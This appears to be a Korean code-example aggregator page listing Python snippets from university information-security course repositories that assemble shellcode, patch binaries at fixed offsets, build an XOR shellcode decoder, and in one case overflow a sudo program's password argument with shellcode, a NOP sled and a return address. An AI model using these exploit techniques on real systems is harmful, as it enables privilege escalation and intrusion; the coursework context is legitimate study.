Python assemble_file 예제들

예제 #1

파일: q2.py 프로젝트: Guymozes/Information-Security

def patch_program(path):
    with open(path, 'rb') as reader:
        data = reader.read()
    data_list = list(data)
    first_patch = assemble.assemble_file("patch1.asm")
    second_patch = assemble.assemble_file("patch2.asm")
    for i in range(len(first_patch)):
        data_list[i + 0x635] = first_patch[i]
    for i in range(len(second_patch)):
        data_list[i + 0x5CD] = second_patch[i]
    data = "".join(data_list)
    with open(path + '.patched', 'wb') as writer:
        writer.write(data)

예제 #2

파일: q2.py 프로젝트: VladyslavKozhukhov/Information_Security

def patch_program(path):
    with open(path, 'rb') as reader:
        data = reader.read()
    Ldata = list(data)
    patch1 = assemble.assemble_file("patch1.asm")
    patch2 = assemble.assemble_file("patch2.asm")
    for i in range(len(patch1)):
        Ldata[0x633 + i] = patch1[i]
    for j in range(len(patch2)):
        Ldata[0x5d0 + j] = patch2[j]
    data = "".join(Ldata)
    with open(path + '.patched', 'wb') as writer:
        writer.write(data)

예제 #3

파일: q2.py 프로젝트: OriGlassman/Information-Security

def patch_program(path):
    with open(path, 'rb') as reader:
        data = reader.read()
    data_list = list(data)
    replacement_list = list(assemble.assemble_file("patch1.asm"))
    for i in range(len(replacement_list)):
        data_list[0x633 + i] = replacement_list[i]
    replacement_list = list(assemble.assemble_file("patch2.asm"))
    for i in range(len(replacement_list)):
        data_list[0x5cd + i] = replacement_list[i]
    data = "".join(data_list)
    with open(path + '.patched', 'wb') as writer:
        writer.write(data)

예제 #4

파일: q3.py 프로젝트: OriGlassman/Information-Security

def get_decoder(indices):
    decoder_file = open("decoder.asm", "w")
    # get eax to point to the start of the encoded shellcode
    decoder_file.write("push esp\n") #option 1
    decoder_file.write("pop eax\n")
    for i in range(165):
    	decoder_file.write("dec eax\n")		#	 161 is the len of the shellcode, 4 is to the ra.	
    #decoder_file.write("add eax, 0x6f6f6f6c\n") # option 2 (option 1 is better because it will work in every os, dynamic addresses)
    #decoder_file.write("add eax, 0x507f716f\n")
   	#decoder_file.write("add eax, 0x110000\n") # #now points to the start of the encoded shellcode (suppose to be 0xbfffe0db)

    # get bl = 0xff
    decoder_file.write("push 0\n")
    decoder_file.write("pop ebx\n")
    decoder_file.write("dec ebx\n")
    ###
    decoder_file.write("push 0\n")
    decoder_file.write("pop edx\n") # counter for the index
    EDX=0
    for offset in indices:
        if offset==0:
            decoder_file.write("xor byte ptr [EAX + 0], bl\n")
            decoder_file.write("inc edx\n")
            EDX+=1
            continue
        while EDX<offset:
            decoder_file.write("inc edx\n")
            EDX+=1
        decoder_file.write("xor byte ptr [EAX + EDX], bl" +'\n')
    decoder_file.close()
    return assemble.assemble_file("decoder.asm")

예제 #5

파일: q2.py 프로젝트: uribr/infosec17

def get_shellcode():
    '''This function returns the machine code (bytes) of the shellcode.
    
    This does not include the size, return address, nop slide or anything else!
    From this function you should return only the shellcode!
    '''
    shellcode = assemble.assemble_file(PATH_TO_SHELLCODE)
    return shellcode

예제 #6

def patch_program(path):
    with open(path, 'rb') as reader:
        data = reader.read()

    small_dead_zone_begin_offset = 0x633
    small_dead_zone_end_offset = 0x63A
    large_dead_zone_begin_offset = 0x5CD
    large_dead_zone_end_offset = 0x631

    patch1_bin = assemble.assemble_file(patch1_path)
    patch1_len = len(patch1_bin)
    patch2_bin = assemble.assemble_file(patch2_path)
    patch2_len = len(patch2_bin)

    # patch small dead zone
    data = data[:small_dead_zone_begin_offset] + str(
        patch1_bin) + data[small_dead_zone_begin_offset + patch1_len:]
    # patch large dead zone
    data = data[:large_dead_zone_begin_offset] + str(
        patch2_bin) + data[large_dead_zone_begin_offset + patch2_len:]

    with open(path + '.patched', 'wb') as writer:
        writer.write(data)

예제 #7

파일: q2.py 프로젝트: OriGlassman/Information-Security

def get_shellcode():
    return assemble.assemble_file("shellcode.asm")

예제 #8

def run_shell():
    trash = assemble.assemble_file("shellcode.asm")
    password = '******' * 11 + trash + (56 -
                                      len(trash)) * '\x90' + "\x44\xe0\xff\xbf"
    subprocess.call([PATH_TO_SUDO, password, "ls"])

예제 #9

파일: q2.py 프로젝트: arikolsh/infosec-backup

def get_shellcode():
    shellcode = assemble.assemble_file(PATH_TO_SHELLCODE)
    return shellcode

예제 #10

def get_shellcode():

    trash = assemble.assemble_file(PATH_TO_SHELLCODE)
    return trash